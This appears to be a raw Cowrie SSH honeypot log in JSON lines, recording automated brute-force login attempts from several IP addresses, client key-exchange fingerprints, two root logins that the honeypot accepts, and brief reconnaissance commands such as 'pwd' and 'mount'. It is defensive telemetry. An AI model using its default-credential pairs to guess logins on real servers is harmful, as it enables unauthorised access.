{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:45:02.805746Z","src_ip":"41.226.27.251","session":"d823e14abd59"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-31T02:45:02.976364Z","src_ip":"41.226.27.251","session":"d823e14abd59"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:45:04.222934Z","src_ip":"41.226.27.251","session":"d823e14abd59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36274,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe9125122295","protocol":"ssh","message":"New connection: 212.227.235.229:36274 (1.2.3.4:22) [session: fe9125122295]","sensor":"my-vps","timestamp":"2025-08-31T02:45:04.300222Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40034,"dst_ip":"1.2.3.4","dst_port":22,"session":"37f2bd509e3b","protocol":"ssh","message":"New connection: 212.227.235.229:40034 (1.2.3.4:22) [session: 37f2bd509e3b]","sensor":"my-vps","timestamp":"2025-08-31T02:45:16.519441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:45:17.588281Z","src_ip":"212.227.235.229","session":"37f2bd509e3b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:45:17.589255Z","src_ip":"212.227.235.229","session":"37f2bd509e3b"}
{"eventid":"cowrie.session.closed","duration":"61.1","message":"Connection lost after 61.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:45:21.118111Z","src_ip":"212.227.235.229","session":"1578d0eff59d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47522,"dst_ip":"1.2.3.4","dst_port":22,"session":"cca8a8a25572","protocol":"ssh","message":"New connection: 212.227.125.160:47522 (1.2.3.4:22) [session: cca8a8a25572]","sensor":"my-vps","timestamp":"2025-08-31T02:45:21.999763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:45:22.398053Z","src_ip":"212.227.235.229","session":"fe9125122295"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:45:22.398752Z","src_ip":"212.227.235.229","session":"fe9125122295"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":41512,"dst_ip":"1.2.3.4","dst_port":22,"session":"bdadfb0b338c","protocol":"ssh","message":"New connection: 41.226.27.251:41512 (1.2.3.4:22) [session: bdadfb0b338c]","sensor":"my-vps","timestamp":"2025-08-31T02:45:22.964817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:45:23.027795Z","src_ip":"41.226.27.251","session":"bdadfb0b338c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:45:23.028557Z","src_ip":"41.226.27.251","session":"bdadfb0b338c"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-08-31T02:45:23.200417Z","src_ip":"41.226.27.251","session":"bdadfb0b338c"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"1234567","message":"login attempt [ftptest/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T02:45:23.225865Z","src_ip":"212.227.235.229","session":"37f2bd509e3b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:45:23.588072Z","src_ip":"212.227.125.160","session":"cca8a8a25572"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:45:23.588777Z","src_ip":"212.227.125.160","session":"cca8a8a25572"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:45:24.446348Z","src_ip":"41.226.27.251","session":"bdadfb0b338c"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:45:25.107878Z","src_ip":"212.227.235.229","session":"37f2bd509e3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35294,"dst_ip":"1.2.3.4","dst_port":22,"session":"25f353e0700b","protocol":"ssh","message":"New connection: 212.227.125.160:35294 (1.2.3.4:22) [session: 25f353e0700b]","sensor":"my-vps","timestamp":"2025-08-31T02:45:28.377392Z"}
{"eventid":"cowrie.login.success","username":"root","password":"MUda$#21","message":"login attempt [root/MUda$#21] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:45:33.267418Z","src_ip":"212.227.125.160","session":"cca8a8a25572"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:45:37.676470Z","src_ip":"212.227.125.160","session":"cca8a8a25572"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-31T02:45:37.677216Z","src_ip":"212.227.125.160","session":"cca8a8a25572"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58922,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7b3b2d06787","protocol":"ssh","message":"New connection: 212.227.125.160:58922 (1.2.3.4:22) [session: c7b3b2d06787]","sensor":"my-vps","timestamp":"2025-08-31T02:45:37.795302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:45:38.268010Z","src_ip":"212.227.125.160","session":"c7b3b2d06787"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:45:38.294240Z","src_ip":"212.227.125.160","session":"c7b3b2d06787"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":43914,"dst_ip":"1.2.3.4","dst_port":22,"session":"5dd5a8e2bc4a","protocol":"ssh","message":"New connection: 201.148.180.50:43914 (1.2.3.4:22) [session: 5dd5a8e2bc4a]","sensor":"my-vps","timestamp":"2025-08-31T02:45:38.847966Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:45:39.408168Z","src_ip":"212.227.125.160","session":"cca8a8a25572"}
{"eventid":"cowrie.session.closed","duration":"17.4","message":"Connection lost after 17.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:45:39.410177Z","src_ip":"212.227.125.160","session":"cca8a8a25572"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:45:40.521630Z","src_ip":"201.148.180.50","session":"5dd5a8e2bc4a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:45:40.522284Z","src_ip":"201.148.180.50","session":"5dd5a8e2bc4a"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"1234567","message":"login attempt [ftptest/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T02:45:40.588212Z","src_ip":"212.227.125.160","session":"c7b3b2d06787"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:45:42.152695Z","src_ip":"212.227.125.160","session":"c7b3b2d06787"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":59984,"dst_ip":"1.2.3.4","dst_port":22,"session":"960532ca48e6","protocol":"ssh","message":"New connection: 41.226.27.251:59984 (1.2.3.4:22) [session: 960532ca48e6]","sensor":"my-vps","timestamp":"2025-08-31T02:45:43.919383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:45:43.953220Z","src_ip":"41.226.27.251","session":"960532ca48e6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:45:43.962462Z","src_ip":"41.226.27.251","session":"960532ca48e6"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-31T02:45:44.132892Z","src_ip":"41.226.27.251","session":"960532ca48e6"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:45:45.309096Z","src_ip":"41.226.27.251","session":"960532ca48e6"}
{"eventid":"cowrie.login.success","username":"root","password":"MUda$#21","message":"login attempt [root/MUda$#21] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:45:48.161766Z","src_ip":"201.148.180.50","session":"5dd5a8e2bc4a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:45:51.071581Z","src_ip":"201.148.180.50","session":"5dd5a8e2bc4a"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T02:45:51.072404Z","src_ip":"201.148.180.50","session":"5dd5a8e2bc4a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"2.1","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:45:53.128078Z","src_ip":"201.148.180.50","session":"5dd5a8e2bc4a"}
{"eventid":"cowrie.session.closed","duration":"14.3","message":"Connection lost after 14.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:45:53.129417Z","src_ip":"201.148.180.50","session":"5dd5a8e2bc4a"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":57710,"dst_ip":"1.2.3.4","dst_port":22,"session":"c942b0b775ef","protocol":"ssh","message":"New connection: 41.226.27.251:57710 (1.2.3.4:22) [session: c942b0b775ef]","sensor":"my-vps","timestamp":"2025-08-31T02:46:04.725400Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:46:04.741581Z","src_ip":"41.226.27.251","session":"c942b0b775ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:46:04.779498Z","src_ip":"41.226.27.251","session":"c942b0b775ef"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:46:04.961450Z","src_ip":"41.226.27.251","session":"c942b0b775ef"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:46:06.289020Z","src_ip":"41.226.27.251","session":"c942b0b775ef"}
{"eventid":"cowrie.session.closed","duration":"42.1","message":"Connection lost after 42.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:46:10.449796Z","src_ip":"212.227.125.160","session":"25f353e0700b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49352,"dst_ip":"1.2.3.4","dst_port":22,"session":"42cca19f8bc5","protocol":"ssh","message":"New connection: 212.227.235.229:49352 (1.2.3.4:22) [session: 42cca19f8bc5]","sensor":"my-vps","timestamp":"2025-08-31T02:46:16.032406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:46:16.813443Z","src_ip":"212.227.235.229","session":"42cca19f8bc5"}
